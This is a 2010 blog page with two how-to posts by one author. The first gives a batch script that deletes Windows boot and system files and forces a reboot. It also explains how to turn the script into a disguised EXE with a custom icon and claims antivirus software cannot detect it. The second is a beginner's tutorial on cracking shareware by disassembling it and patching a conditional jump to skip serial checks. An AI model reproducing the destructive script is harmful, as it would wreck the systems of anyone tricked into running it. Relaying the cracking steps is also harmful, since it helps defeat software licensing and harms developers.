Saturday, 9 January 2010
MAKE A KILLER VIRUS By Ahmed N
steps to create it :
1 - create a new text document
2 - paste this commands in the text document :
———————-
del boot
del autoexec.bat
del bootmgr
del config.sys
del pagefile.sys
shutdown -r -c “you had been by Ahmed n . your pc now is dead !!!!.”
——————————————————————————————————
3 - now save this document as batch file by (save as from file tab thenchange text document to all files and then remove (txt) and put instead(bat)
4 - now its a batch file that can be revealed !!! (by right click it and edit from the menu)
5 - know you have to convert the batch file to an executable file (EXE)
that you can find it free at :
http://download.cnet.com/Bat-To-Exe-Converter/3000-2069_4-10555897.html
note : in this tool you can put your exe data , password protect , custom icon,and other utilities with friendly user interface
note 2 : don’t even try to open the file you will hurt your self believe me !!!
note 3 : this virus delete some major boot files and then shut down the computer
the next time you want to turn on it will not boot
so you have to do a complete format.
note 4 : this virus is not detectable by antiviruses.
Thank you for your time
Friday, 8 January 2010
How to make Utorrent Faster By Ahmed N
Thursday, 7 January 2010
HOW TO CRACK A SOFTWARE(for beginners) by Ahmed N
HOW TO CRACK A SOFTWARE(for beginners)
How to get started in the art of cracking
—————————————-
Introduction:
————-
Tons of new programs are coming out each day… But the bad thing is that
most of them are shareware, which means that you have to pay to get the full
version (most of the time, when you’ll register, the creators of the program
will e-mail you an unlock code)… But there are some guys called “crackers”
who can modify the program so that you don’t need to pay to get the full
version. In this tutorial, you’ll learn how to crack programs (except VB
programs). I hope that you’ll enjoy it.
———————————————-
| |
|1) Programs that you’ll need to get started |
|2) Basic things about cracking |
1) Programs that you’ll need to get started
—————————————-
Here’s the list of programs that you’ll need to get to start cracking:
WinDisassembler
Hex Workshop
Hacker’s View
2) Basic things about cracking
—————————
Please remember that in this tutorial, I expect that you never cracked a
program, so it should be easy for beginners.
Here is, step by step, what you have to do to crack a program which needs a
name and a serial number (assuming that there’s no good protection):
a) Run the program
cool.gif Go to the place where you can enter your name and a serial number
c) Type your name and any serial number
d) Write down (or memorise) the error message
e) Copy the program’s exe to .bak (for backup) and to .w32
f) Disassemble [progname].w32 with WinDisassembler
g) Click on search -> search. Type the error message, and click on search
h) Scroll up until you find this “Referenced by a (U)nconditional or
©onditional Jump at Address: | blabla” (where blabla is the address)
i) Go to this address by scrolling up (the addresses are writen on the left)
j) There should be “jne” written at this address.
h) Double-click on the line and memorise the offset (written on the status bar)
i) Launch hacker’s view and edit the exe files
j) Press F4 and select Decode Mode
k) Press F5 and type the Offset.
l) Press F3 and type 74 (which will change jne to je)
m) If the program isn’t very securised, it should be cracked now!
n) Run the program
o) Type your name and any serial number
p) It should work!
Note: If it didn’t work, then it means that the program is more protected.
you have to learn more about assamble language and practice hard to crack advanced softwares.